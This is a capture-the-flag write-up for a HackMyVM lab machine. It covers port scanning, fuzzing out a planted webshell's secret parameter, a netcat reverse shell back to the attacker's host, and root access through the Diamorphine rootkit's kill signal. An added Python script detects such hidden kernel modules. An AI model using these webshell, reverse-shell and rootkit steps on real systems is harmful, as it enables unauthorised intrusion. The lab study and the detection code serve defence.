NOTES ABOUT Hacked

[ 2022-12-06 ] [ HackMyVM / Hacked ]

Status: Rooted
Skills: Port Scanning, Fuzzing, Rootkit
Tools: nmap, gobuster

PORT SCANNING

$ nmap -sCSV -p- 10.0.2.49

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:75:44:05:5f:f8:4f:ac:a1:33:fa:84:03:db:6f:94 (RSA)
| 256 5a:b6:c6:9d:a9:15:42:74:4c:7a:f9:dd:67:ae:75:0e (ECDSA)
|_ 256 05:97:3c:74:bd:cf:8d:80:87:05:26:64:7f:d9:3d:c3 (ED25519)
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2

GETTING IN

$ curl http://10.0.2.49/
HACKED BY h4x0r

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.49
/index.html (Status: 200) [Size: 16]
/robots.txt (Status: 200) [Size: 16]

$ curl http://10.0.2.49/robots.txt
/secretnote.txt

$ curl http://10.0.2.49/secretnote.txt
[X] Enumeration
[X] Exploitation
[X] Privesc
[X] Maintaining Access.
|__> Webshell installed.
|__> Root shell created.

-h4x0r

$ gobuster -q dir -w /usr/share/seclists/Web-Shells/backdoor_list.txt -u http://10.0.2.49
/si***********or.php (Status: 302) [Size: 62] [--> /]
/si***********or.php (Status: 302) [Size: 62] [--> /]

$ curl http://10.0.2.49/simple-backdoor.php
I modified this webshell to only execute my secret parameter.

$ gobuster -q fuzz -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.0.2.49/simple-backdoor.php?FUZZ=id --exclude-length 62
Found: [Status=302] [Length=115] http://10.0.2.49/simple-backdoor.php?******=id

$ curl http://10.0.2.49/simple-backdoor.php?****=id
I modified this webshell to only execute my secret parameter.
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ curl http://10.0.2.49/simple-backdoor.php?******=nc%2010.0.2.15%20443%20-c%20sh

ELEVATING PRIVILEGES

https://github.com/m0nad/Diamorphine

www-data@hacked:~$ lsmod
Module Size Used by
diamorphine 16384 0 #rootkit
[...]

# Sending signal 64 (to any pid) makes the given user become root
www-data@hacked:~$ kill -64 1337
www-data@hacked:~$ id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
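
Added example, not part of the original notes: a small Python check a defender can run on the box to spot an LKM rootkit like the one above. It compares /sys/module with /proc/modules (what lsmod reads) and also flags the diamorphine module name seen in the lsmod output; the sample data is constructed.

```python
"""Flag loadable kernel modules present in /sys/module but absent from /proc/modules.

lsmod only reads /proc/modules, which comes from the kernel's module list. An
LKM rootkit that unlinks itself from that list disappears from lsmod, but its
/sys/module/<name>/ directory is a separate structure and commonly remains.
Built-in modules also get a /sys/module entry but lack the 'initstate' file,
which is used here to tell them apart. All sample data below is constructed.
"""
import os

KNOWN_ROOTKIT_MODULES = {"diamorphine"}  # the name shown by lsmod above

def parse_proc_modules(text):
    """Return the set of module names in /proc/modules-format text."""
    return {line.split()[0] for line in text.splitlines() if line.strip()}

def audit_modules(proc_modules_text, sysfs_modules):
    """Return sorted (module, reason) findings. sysfs_modules maps each
    /sys/module/<name> entry to True when it has an 'initstate' file,
    i.e. it is a loadable module rather than built-in code."""
    listed = parse_proc_modules(proc_modules_text)
    findings = set()
    for name, is_loadable in sysfs_modules.items():
        if is_loadable and name not in listed:
            findings.add((name, "loaded module missing from /proc/modules"))
    for name in (listed | set(sysfs_modules)) & KNOWN_ROOTKIT_MODULES:
        findings.add((name, "known rootkit module name"))
    return sorted(findings)

def collect_live():
    """Read the real /proc/modules and /sys/module on a Linux host."""
    with open("/proc/modules") as fh:
        text = fh.read()
    sysfs = {n: os.path.exists(os.path.join("/sys/module", n, "initstate"))
             for n in os.listdir("/sys/module")}
    return text, sysfs

# Constructed sample: the rootkit has unlinked itself from the module list,
# so /proc/modules omits it while /sys/module/diamorphine/initstate remains.
SAMPLE_PROC_MODULES = ("nf_tables 245760 0 - Live 0x0000000000000000\n"
                       "xt_conntrack 16384 1 - Live 0x0000000000000000\n")
SAMPLE_SYSFS = {"nf_tables": True, "xt_conntrack": True,
                "diamorphine": True, "printk": False}  # printk: built-in

if __name__ == "__main__":
    data = collect_live() if os.path.isdir("/sys/module") else (SAMPLE_PROC_MODULES, SAMPLE_SYSFS)
    for name, reason in audit_modules(*data):
        print(f"[!] {name}: {reason}")
```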

www-data@hacked:/home/h4x0r$ cat user.txt
*********************

www-data@hacked:/root$ cat root.txt
*********************

www-data@hacked:/$ init 0
